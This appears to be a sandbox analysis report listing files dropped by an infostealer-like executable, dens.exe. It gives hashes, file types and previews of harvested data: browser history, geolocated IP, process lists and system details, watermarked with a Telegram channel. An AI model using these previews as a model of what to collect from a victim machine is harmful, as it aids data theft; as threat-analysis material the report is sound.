SSDEEP:48:LozmxDwemx5VcDKJMmx2VuDKJMmxhzxANLpzxAjVVpbjxA0ScpbjxAb:Lozmlwem/aDKMmAEDKMmfz0cdj7njU
MD5:3F9D565B3E2542913E39FA9CB2994AC5
SHA1:772CE9973E114A5FD24F6AFADA1C262016066F51
SHA-256:8C2E3EC9B5B0AD9D8FC2BC89CC031F5156A5860F16AE05603A5FEA8F221543AE
SHA-512:749FABE83DE42DFF1CC934084774E27FF35A874FE627D82052858F1ED7CBCABB396E3B3D0FE607E6F7D622E3D24871543BBCFFBD4EEC1F5F026D01460347244D
Malicious:false
Preview:----------------------https://t.me/waltuhium----------------------..======================================================================..ID : 1..URL : https://go.microsoft.com/fwlink/?linkid=851546..itle : Examples of Office product keys - Microsoft Support..Visit Count : 2..Last Visit Time 13340808471256388..====================================================================================..ID : 2..URL : https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016..itle : Examples of Office product keys - Microsoft Support..Visit Count : 2..Last Visit Time 13340808471256388..====================================================================================..ID : 3..URL : https://support.microsoft.com/en-us/office/7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us..itle : Examples of Office product keys - Microsoft Support..Visit Count : 2..Last Visit Time 13340808471256388..==========================================
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):697826
Entropy (8bit):7.929890901452363
Encrypted:false
SSDEEP:12288:mK8bnnYbyazGUjMWU3CV6jEefayPkOKjVT/v2RXefyZF410yzDGwsrzc06b2:m3nnYblaUrL0lcHZr2BeQF419XG7zcj2
MD5:D85998E581146B096F9D38B2D2A9F3AB
SHA1:1B430890888B2B494DF5B41642B445E706B1942E
SHA-256:78114A3606A9B0C5593320068D6BAD16E158DF6CF6FBC3810F323246B381ED5F
SHA-512:464124D1A5CBC6E6E268A61C821E3C7345F76421B9623E3C80C2644ADC594DDADFB872B775540F88E596CE16D1A312A6519D847D8A66F9463BD116A2AE45A8B0
Malicious:false
Process:C:\Users\user\Desktop\dens.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):250
Entropy (8bit):4.251239015418792
Encrypted:false
SSDEEP:3:111T8BeQ/9GMAR43EN3VOvwHE96ZnXEUWor2x4EcatMWAqpmn:LsPLAXN3Dk96ZnXEn54deMWo
MD5:251139F4BBD7C5BEDA219A90E4773BE6
SHA1:5BBEDA313B658A75E934AD8720F2FBBDE9AD8048
SHA-256:D78C776F14B19C2B8B29A2BC841ED374A2D737FDD8834F84B7FA92A62D453E94
SHA-512:CC1D58212317266DEC8BFA931032372D2B957D84A6DB190AC7F178BEAF065F89F38229F0D4A78D07A7B3761840462C42D1628FD198B10D4E062969A1909DFD0C
Malicious:true
Preview:----------------------https://t.me/waltuhium----------------------..======================================================================..173.254.250.68..United States..Killeen..America/Chicago..QuadraNet OMGITSFAST AS8100 QuadraNet Enterprises LLC
Process:C:\Users\user\Desktop\dens.exe
File Type:ASCII text, with CRLF, CR line terminators
Category:dropped
Size (bytes):24246
Entropy (8bit):4.6451838770544835
Encrypted:false
SSDEEP:384:I68QCP+Isv+ezjctgsYBH5FEogQj9xIxsgDCtleQha61+Q4nQQkLE0M2PQaFYDvr:DQoZqVWDU
MD5:CCBE2E5EF0ED50B800ED53785C841235
SHA1:C7BDA3A1D04DDED43379D2ECE75B052B39519255
SHA-256:D4FA93F7828D7EAF3030A0EEEB5B253CC3751A4AB48E3C62752B73660F3C2D2E
SHA-512:EE49B04627FD276D42A78C91005D1A763BB01D7DD0E67E38A8D09721DB709162ABE4BC4E00704413B1DA36F8E293C0F9F80F99138BB9AEA43667DE9B7D6C2256
Malicious:true
Preview:----------------------https://t.me/waltuhium----------------------..======================================================================.....Image Name: System Idle Process...PID: 0...Session Name: Services...Session#: 0...Mem Usage: 8 K......Image Name: System...PID: 4...Session Name: Services...Session#: 0...Mem Usage: 176 K......Image Name: Registry...PID: 92...Session Name: Services...Session#: 0...Mem Usage: 79'456 K......Image Name: smss.exe...PID: 324...Session Name: Services...Session#: 0...Mem Usage: 1'236 K......Image Name: csrss.exe...PID: 408...Session Name: Services...Session#: 0...Mem Usage: 5'296 K......Image Name: wininit.exe...PID: 484...Session Name: Services...Session#: 0...Mem Usage: 7'256 K......Image Name: csrss.exe...PID: 492...Session Name: Console...Session#: 1...Mem Usage: 6'012 K......Image Name: winlogon.exe...PID: 552...
Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:Algol 68 source, ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):142996
                                                                                                                                                                                                                                            Entropy (8bit):4.376230488046689
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:0Fz5+DlX7z8oiEmea91gbTvU2LaWJVQgDFIaLVk2vcE66drKwIRBFKdQT8RSayLW:0F1wE8
                                                                                                                                                                                                                                            MD5:B548D96559A283855A3C48991CFC3F73
                                                                                                                                                                                                                                            SHA1:A30C0EBAD0A6B2D125741E5369250EEA230CBB05
                                                                                                                                                                                                                                            SHA-256:8DD747047A9DF15624C0C6D52C3FAB541928F8A9DA74F776F3DF63402425259B
                                                                                                                                                                                                                                            SHA-512:1233EEC018B1B1E1BE71D5AF033EACFCE095B06865C729C2B6B0AB6B8D8A05269F98F30F806E093D6C630FD7D0B2FDFF2F1484AC2BDC778196E972286B1561AB
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Preview:----------------------https://t.me/waltuhium----------------------..======================================================================..####System Info#### ......Host Name: user-PC...OS Name: Microsoft Windows 10 Pro...OS Version: 10.0.19045 N/A Build 19045...OS Manufacturer: Microsoft Corporation...OS Configuration: Standalone Workstation...OS Build Type: Multiprocessor Free...Registered Owner: hardz...Registered Organization: ...Product ID: 00330-71388-77104-AAOEM...Original Install Date: 03/10/2023, 09:57:18...System Boot Time: 24/09/2023, 13:00:03...System Manufacturer: EOU1nWFnl8CywFm...System Model: HFlecuWU...System Type: x64-based PC...Processor(s): 2 Processor(s) Installed.... [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz... [02]: Intel64
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):2.0
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:qn:qn
                                                                                                                                                                                                                                            MD5:3F1D1D8D87177D3D8D897D7E421F84D6
                                                                                                                                                                                                                                            SHA1:DD082D742A5CB751290F1DB2BD519C286AA86D95
                                                                                                                                                                                                                                            SHA-256:F02285FB90ED8C81531FE78CF4E2ABB68A62BE73EE7D317623E2C3E3AEFDFFF2
                                                                                                                                                                                                                                            SHA-512:2AE2B3936F31756332CA7A4B877D18F3FCC50E41E9472B5CD45A70BEA82E29A0FA956EE6A9EE0E02F23D9DB56B41D19CB51D88AAC06E9C923A820A21023752A9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:blat
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):114688
                                                                                                                                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):28672
                                                                                                                                                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):126976
                                                                                                                                                                                                                                            Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                            MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                            SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                            SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                            SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):126976
                                                                                                                                                                                                                                            Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                            MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                            SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                            SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                            SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):49152
                                                                                                                                                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                            Malicious:false
Preview:SQLite format 3
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):79089
                                                                                                                                                                                                                                            Entropy (8bit):7.826035301403449
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:YG5/p/kbmg0DxtBGxBcw8e+Bs8Nt06GU8l/z175k/QtlbYlQV9MGFcEtjtQ1YMt8:n5/Jkbmg0DxqxOw8e+Bs8NwUA/z175kA
                                                                                                                                                                                                                                            MD5:2DE3905B3C79C3EDDF4364EF98AE364A
                                                                                                                                                                                                                                            SHA1:A0C16CD8FF717AB74FC4C9FA14CE3EED4A8E0577
                                                                                                                                                                                                                                            SHA-256:5384BA4B1F750731AAC59739E2EE136AC42F6114E6D6C2E7905CF790895DD4F1
                                                                                                                                                                                                                                            SHA-512:92726E6A1E9E015BD12DFBBF10272E216B61162BD8C453566DD4D814BAAB92D2744AAE82DDE18787700E0C6D06BF141A29449FD41778E6334E38B0968BA1BA12
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.705615236042988
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                                                                                                                                                                            MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                                                                                                                                                            SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                                                                                                                                                            SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                                                                                                                                                            SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                            MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                            SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                            SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                            SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                            MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                            SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                            SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                            SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                            MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                            SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                            SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                            SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                            MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                            SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                            SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                            SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                            MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                            SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                            SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                            SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.702896917219035
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
                                                                                                                                                                                                                                            MD5:C68274AA8B7F713157BEBE2FCC2EA5D3
                                                                                                                                                                                                                                            SHA1:52A5A2D615A813B518DDAAC2A02095F1059DAAD5
                                                                                                                                                                                                                                            SHA-256:362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
                                                                                                                                                                                                                                            SHA-512:BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.705615236042988
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                                                                                                                                                                            MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                                                                                                                                                            SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                                                                                                                                                            SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                                                                                                                                                            SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.694985340190863
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                                                                                                                                                                                            MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                                                                                                                                                                                            SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                                                                                                                                                                                            SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                                                                                                                                                                                            SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.695860210921229
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:TFQT9Q9JyaMK5Tkl4rqfRs73U2PVD3BWUS:mT9iSRiqfRsxPGt
                                                                                                                                                                                                                                            MD5:71B2CE35DD64EA4E8D5C67BD6BFF698E
                                                                                                                                                                                                                                            SHA1:48D65EB151E97D1D41267A43B4DC1801C4F89255
                                                                                                                                                                                                                                            SHA-256:A6DBE7820A7D3FD17EB24EE41CCE56C9647B150E1A1392F58ABD947EE1829FC7
                                                                                                                                                                                                                                            SHA-512:73128DA16516B0E5D04EB6D859A8FDC4663B47F74A7AAC99263582746BC414BAB05FB4DFF40F5E0EF838682D63671FE11DD6C5891D059D51FFB872E1FD9B60BA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                            MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                            SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                            SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                            SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                            MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                            SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                            SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                            SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                            MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                            SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                            SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                            SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview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
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                            MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                            SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
